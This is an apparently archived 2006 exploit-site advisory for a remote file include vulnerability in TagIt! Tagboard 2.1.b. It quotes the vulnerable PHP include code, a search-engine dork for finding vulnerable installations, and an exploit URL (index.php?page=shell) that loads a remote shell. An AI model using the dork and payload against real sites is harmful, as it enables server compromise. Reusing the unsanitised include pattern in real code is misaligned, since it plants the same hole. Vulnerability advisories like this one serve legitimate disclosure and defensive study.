id: 902
date: 09/27/2006
title: TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
author: Kernel-32
cves: 

=========================================================================
TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability
=========================================================================



 Tagmin C.C 2.1.B Remote File Include
########################################
+Advisory #3
+Product :Tagmin Control Center 2.1.B
+Dork: inurl:"/tagit2b/"
+Vulnerable: Remote File Include
+Risk:High
+Discovered:by Kernel-32
+Greetz: BeLa ;)
########################################
Vulnerable code:
----------------
if(isset($_GET['load']) && $_GET['load'] == "dtu" or $_GET['load'] == "tag") {
include("$page.php");
}
else {
include("tagviewer.php");
}
?>

---------------
Vulnerable:
http://site/path/index.php?page=shell


#  0day.today [2023-03-25]  #